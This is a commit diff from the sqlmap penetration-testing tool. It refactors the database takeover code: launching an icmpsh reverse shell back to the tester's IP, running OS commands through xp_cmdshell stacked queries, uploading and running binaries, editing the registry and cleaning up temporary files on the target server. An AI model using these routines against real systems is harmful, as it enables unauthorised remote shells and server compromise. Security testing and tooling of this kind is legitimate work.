Minor bug fix to properly delete sqlmap temporary files on the database server file system at shutdown.

Minor improvements at ICMPsh tunnel to cleanup properly the dbms at shutdown and avoid checking/writing sys_bineval() UDF as it's a PE and needs to be called by sys_exec() only. Got rid of useless doubleslash param in delRemoteFile() method. Major code refactoring to xp_cmdshell.py methods and parent calls.
2025-03-03 19:55:47 +03:00 · 2010-10-28 00:19:40 +00:00 · 2010-10-28 00:19:40 +00:00 · 4f8e9da1b6
commit 4f8e9da1b6
parent 56c16cb471
10 changed files with 47 additions and 89 deletions
--- a/extra/icmpsh/icmpsh_m.py
+++ b/extra/icmpsh/icmpsh_m.py
@ -93,7 +93,7 @@ def main(src, dst):
                except:
                    pass

-                if cmd == 'exit':
+                if cmd == 'exit\n':
                    return

                # Set sequence number and identifier
--- a/lib/takeover/abstraction.py
+++ b/lib/takeover/abstraction.py
@ -32,7 +32,7 @@ class Abstraction(Web, UDF, xp_cmdshell):
        Web.__init__(self)
        xp_cmdshell.__init__(self)

-    def execCmd(self, cmd, silent=False, forgeCmd=False):
+    def execCmd(self, cmd, silent=False):
        if self.webBackdoorUrl and not kb.stackedTest:
            self.webBackdoorRunCmd(cmd)

@ -40,7 +40,7 @@ class Abstraction(Web, UDF, xp_cmdshell):
            self.udfExecCmd(cmd, silent=silent)

        elif kb.dbms == "Microsoft SQL Server":
-            self.xpCmdshellExecCmd(cmd, silent, forgeCmd)
+            self.xpCmdshellExecCmd(cmd, silent)

        else:
            errMsg = "Feature not yet implemented for the back-end DBMS"
@ -79,7 +79,7 @@ class Abstraction(Web, UDF, xp_cmdshell):
            else:
                dataToStdout("No output\n")
        else:
-            self.execCmd(cmd, forgeCmd=True)
+            self.execCmd(cmd)

    def shell(self):
        if self.webBackdoorUrl and not kb.stackedTest:
--- a/lib/takeover/icmpsh.py
+++ b/lib/takeover/icmpsh.py
@ -7,40 +7,21 @@ Copyright (c) 2006-2010 sqlmap developers (http://sqlmap.sourceforge.net/)
 See the file 'doc/COPYING' for copying permission
 """

-import codecs
 import os
-import re
-import stat
-import sys
 import time

-from select import select
-from subprocess import PIPE
-from subprocess import Popen as execute
-
 from extra.icmpsh.icmpsh_m import main as icmpshmaster

-from lib.core.common import dataToStdout
 from lib.core.common import getLocalIP
 from lib.core.common import getRemoteIP
-from lib.core.common import getUnicode
 from lib.core.common import normalizePath
 from lib.core.common import ntToPosixSlashes
-from lib.core.common import pollProcess
-from lib.core.common import randomRange
 from lib.core.common import randomStr
 from lib.core.common import readInput
 from lib.core.data import conf
 from lib.core.data import kb
 from lib.core.data import logger
 from lib.core.data import paths
-from lib.core.exception import sqlmapDataException
-from lib.core.exception import sqlmapFilePathException
-from lib.core.subprocessng import blockingReadFromFD
-from lib.core.subprocessng import blockingWriteToFD
-from lib.core.subprocessng import setNonBlocking
-from lib.request.connect import Connect as Request
-from lib.takeover.upx import upx


 class ICMPsh:
@ -81,22 +62,18 @@ class ICMPsh:
        infoMsg  = "running icmpsh slave remotely"
        logger.info(infoMsg)

-        self.__icmpshSlaveCmd = "%s -t %s -d 500 -b 30 -s 128" % (self.__icmpslaveRemote, self.lhostStr)
-
-        cmd = "%s &" % self.__icmpshSlaveCmd
-
-        if kb.dbms == "Microsoft SQL Server" and (kb.stackedTest or conf.direct):
-            cmd = self.xpCmdshellForgeCmd(cmd)
+        cmd = "%s -t %s -d 500 -b 30 -s 128 &" % (self.__icmpslaveRemote, self.lhostStr)

        self.execCmd(cmd, silent=True)

    def uploadIcmpshSlave(self, web=False):
        self.__randStr = randomStr(lowercase=True)
+        self.__icmpslaveRemoteBase = "tmpi%s.exe" % self.__randStr

        if web:
-            self.__icmpslaveRemote = "%s/tmpi%s.exe" % (self.webDirectory, self.__randStr)
+            self.__icmpslaveRemote = "%s/%s" % (self.webDirectory, self.__icmpslaveRemoteBase)
        else:
-            self.__icmpslaveRemote = "%s/tmpi%s.exe" % (conf.tmpPath, self.__randStr)
+            self.__icmpslaveRemote = "%s/%s" % (conf.tmpPath, self.__icmpslaveRemoteBase)

        self.__icmpslaveRemote = ntToPosixSlashes(normalizePath(self.__icmpslaveRemote))

@ -115,4 +92,7 @@ class ICMPsh:
        debugMsg  = "icmpsh master exited"
        logger.debug(debugMsg)

-        self.delRemoteFile(self.__icmpslaveRemote, doubleslash=True)
+        time.sleep(1)
+        self.execCmd("taskkill /F /IM %s" % self.__icmpslaveRemoteBase, silent=True)
+        time.sleep(1)
+        self.delRemoteFile(self.__icmpslaveRemote)
--- a/lib/takeover/metasploit.py
+++ b/lib/takeover/metasploit.py
@ -397,9 +397,6 @@ class Metasploit:

        cmd = "%s &" % self.exeFilePathRemote

-        if kb.dbms == "Microsoft SQL Server" and (kb.stackedTest or conf.direct):
-            cmd = self.xpCmdshellForgeCmd(cmd)
-
        self.execCmd(cmd, silent=True)

    def __loadMetExtensions(self, proc, metSess):
@ -648,7 +645,8 @@ class Metasploit:
        logger.debug(debugMsg)

        if not goUdf:
-            self.delRemoteFile(self.exeFilePathRemote, doubleslash=True)
+            time.sleep(1)
+            self.delRemoteFile(self.exeFilePathRemote)

    def smb(self):
        self.__initVars()
--- a/lib/takeover/registry.py
+++ b/lib/takeover/registry.py
@ -87,7 +87,7 @@ class Registry:
            if index != -1:
                data = data[index + len(pattern):]

-        self.delRemoteFile(self.__batPathRemote, doubleslash=True)
+        self.delRemoteFile(self.__batPathRemote)

        return data

@ -101,8 +101,8 @@ class Registry:
        debugMsg += "to registry key '%s'" % self.__regKey
        logger.debug(debugMsg)

-        self.execCmd(cmd=self.__batPathRemote, forgeCmd=True)
-        self.delRemoteFile(self.__batPathRemote, doubleslash=True)
+        self.execCmd(cmd=self.__batPathRemote)
+        self.delRemoteFile(self.__batPathRemote)

    def delRegKey(self, regKey, regValue):
        self.__operation = "delete"
@ -114,5 +114,5 @@ class Registry:
        debugMsg += "from registry key '%s'" % self.__regKey
        logger.debug(debugMsg)

-        self.execCmd(cmd=self.__batPathRemote, forgeCmd=True)
-        self.delRemoteFile(self.__batPathRemote, doubleslash=True)
+        self.execCmd(cmd=self.__batPathRemote)
+        self.delRemoteFile(self.__batPathRemote)
--- a/lib/takeover/xp_cmdshell.py
+++ b/lib/takeover/xp_cmdshell.py
@ -36,7 +36,7 @@ class xp_cmdshell:
            cmd += "RECONFIGURE WITH OVERRIDE; "
            cmd += "EXEC master..sp_configure 'ole automation procedures', 1; "
            cmd += "RECONFIGURE WITH OVERRIDE; "
-            self.xpCmdshellExecCmd(cmd)
+            inject.goStacked(cmd)

        self.__randStr = randomStr(lowercase=True)

@ -51,7 +51,7 @@ class xp_cmdshell:
        if kb.dbmsVersion[0] in ( "2005", "2008" ):
            cmd += " RECONFIGURE WITH OVERRIDE;"

-        self.xpCmdshellExecCmd(cmd)
+        inject.goStacked(cmd)

    def __xpCmdshellConfigure2005(self, mode):
        debugMsg  = "configuring xp_cmdshell using sp_configure "
@ -85,10 +85,10 @@ class xp_cmdshell:
        else:
            cmd = self.__xpCmdshellConfigure2000(mode)

-        self.xpCmdshellExecCmd(cmd)
+        inject.goStacked(cmd)

    def __xpCmdshellCheck(self):
-        query    = self.xpCmdshellForgeCmd("ping -n %d 127.0.0.1" % (conf.timeSec * 2))
+        query = self.xpCmdshellForgeCmd("ping -n %d 127.0.0.1" % (conf.timeSec * 2))
        duration = timeUse(query)

        if duration >= conf.timeSec:
@ -102,17 +102,15 @@ class xp_cmdshell:

        return forgedCmd

-    def xpCmdshellExecCmd(self, cmd, silent=False, forgeCmd=False):
-        if forgeCmd:
-            cmd = self.xpCmdshellForgeCmd(cmd)
-
+    def xpCmdshellExecCmd(self, cmd, silent=False):
+        cmd = self.xpCmdshellForgeCmd(cmd)
        inject.goStacked(cmd, silent)

    def xpCmdshellEvalCmd(self, cmd, first=None, last=None):
        self.getRemoteTempPath()

        tmpFile = "%s/tmpc%s.txt" % (conf.tmpPath, randomStr(lowercase=True))
-        cmd     = self.xpCmdshellForgeCmd("%s > %s" % (cmd, tmpFile))
+        cmd = "%s > %s" % (cmd, tmpFile)

        self.xpCmdshellExecCmd(cmd)

--- a/plugins/dbms/mssqlserver/filesystem.py
+++ b/plugins/dbms/mssqlserver/filesystem.py
@ -146,13 +146,10 @@ class Filesystem(GenericFilesystem):

            logger.debug("moving binary file %s to %s" % (sFile, dFile))

-            commands   = ("cd \"%s\"" % tmpPath,
-                          "ren %s %s" % (chunkName, dFileName),
-                          "move /Y %s %s" % (dFileName, dFile))
-            complComm  = " & ".join(command for command in commands)
-            forgedCmd  = self.xpCmdshellForgeCmd(complComm)
+            commands = ("cd \"%s\"" % tmpPath, "ren %s %s" % (chunkName, dFileName), "move /Y %s %s" % (dFileName, dFile))
+            complComm = " & ".join(command for command in commands)

-            self.execCmd(forgedCmd)
+            self.execCmd(complComm)

        else:
            infoMsg  = "the %s file is bigger than %d " % (fileType, debugSize)
@ -177,13 +174,10 @@ class Filesystem(GenericFilesystem):
                infoMsg += "%s\%s to %s\%s" % (tmpPath, chunkName, tmpPath, dFileName)
                logger.debug(infoMsg)

-                commands   = ("cd %s" % tmpPath,
-                               copyCmd,
-                               "del /F %s" % chunkName)
-                complComm  = " & ".join(command for command in commands)
-                forgedCmd  = self.xpCmdshellForgeCmd(complComm)
+                commands = ("cd %s" % tmpPath, copyCmd, "del /F %s" % chunkName)
+                complComm = " & ".join(command for command in commands)

-                self.execCmd(forgedCmd)
+                self.execCmd(complComm)

                logger.info("file chunk %d written" % counter)

@ -193,12 +187,10 @@ class Filesystem(GenericFilesystem):

            logger.debug("moving binary file %s to %s" % (sFile, dFile))

-            commands  = ("cd %s" % tmpPath,
-                         "move /Y %s %s" % (dFileName, dFile))
+            commands = ("cd %s" % tmpPath, "move /Y %s %s" % (dFileName, dFile))
            complComm = " & ".join(command for command in commands)
-            forgedCmd = self.xpCmdshellForgeCmd(complComm)

-            self.execCmd(forgedCmd)
+            self.execCmd(complComm)

        if confirm:
            self.askCheckWrittenFile(wFile, dFile, fileType)
--- a/plugins/generic/filesystem.py
+++ b/plugins/generic/filesystem.py
@ -205,26 +205,18 @@ class Filesystem:
            charCounter += len(forgedScrLine)

            if charCounter >= maxLen:
-                forgedCmd = self.xpCmdshellForgeCmd(cmd)
-                self.execCmd(forgedCmd)
+                self.execCmd(cmd)

-                cmd         = ""
+                cmd = ""
                charCounter = 0

        if cmd:
-            forgedCmd = self.xpCmdshellForgeCmd(cmd)
-            self.execCmd(forgedCmd)
-
-        commands = (
-                     "cd %s" % tmpPath,
-                     "debug < %s" % randScr,
-                     "del /F /Q %s" % randScr
-                   )
+            self.execCmd(cmd)

+        commands = ( "cd %s" % tmpPath, "debug < %s" % randScr, "del /F /Q %s" % randScr )
        complComm = " & ".join(command for command in commands)
-        forgedCmd = self.xpCmdshellForgeCmd(complComm)

-        self.execCmd(forgedCmd, silent=True)
+        self.execCmd(complComm, silent=True)

        return chunkName

--- a/plugins/generic/misc.py
+++ b/plugins/generic/misc.py
@ -75,20 +75,16 @@ class Miscellaneous:
        kb.bannerFp["dbmsVersion"] = inject.getValue(query, unpack=False)
        kb.bannerFp["dbmsVersion"] = kb.bannerFp["dbmsVersion"].replace(",", "").replace("-", "").replace(" ", "")

-    def delRemoteFile(self, tempFile, doubleslash=False):
+    def delRemoteFile(self, tempFile):
        self.checkDbmsOs()

        if kb.os == "Windows":
-            if doubleslash:
-                tempFile = tempFile.replace("/", "\\\\")
-            else:
-                tempFile = posixToNtSlashes(tempFile)
-
+            tempFile = posixToNtSlashes(tempFile)
            cmd = "del /F /Q %s" % tempFile
        else:
            cmd = "rm -f %s" % tempFile

-        self.execCmd(cmd, forgeCmd=True)
+        self.execCmd(cmd)

    def createSupportTbl(self, tblName, tblField, tblType):
        inject.goStacked("DROP TABLE %s" % tblName)
--- a/plugins/generic/takeover.py
+++ b/plugins/generic/takeover.py
@ -153,6 +153,8 @@ class Takeover(Abstraction, Metasploit, ICMPsh, Registry, Miscellaneous):
                errMsg += "is unlikely to receive commands send from you"
                logger.error(errMsg)

+            self.sysUdfs.pop("sys_bineval")
+
        if kb.stackedTest or conf.direct:
            web = False

@ -244,8 +246,8 @@ class Takeover(Abstraction, Metasploit, ICMPsh, Registry, Miscellaneous):
            if not web or (web and self.webBackdoorUrl is not None):
                self.pwn(goUdf)

-            if not conf.cleanup:
-                self.cleanup()
+        if not conf.cleanup:
+            self.cleanup()

    def osSmb(self):
        stackedTest()